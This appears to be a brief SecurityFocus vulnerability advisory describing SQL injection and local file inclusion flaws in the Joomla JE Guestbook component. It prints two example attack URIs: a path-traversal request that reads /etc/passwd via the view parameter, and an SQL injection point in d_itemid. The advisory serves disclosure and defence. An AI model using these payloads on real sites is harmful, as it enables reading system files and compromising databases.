Joomla! JE Guestbook Component SQL Injection and Local File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs are available:

http://www.example.com/path/index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00


http://www.example.com/path/index.php?option=com_jeguestbook&view=item_detail&d_itemid=[SQLi]


 

Privacy Statement
Copyright 2010, SecurityFocus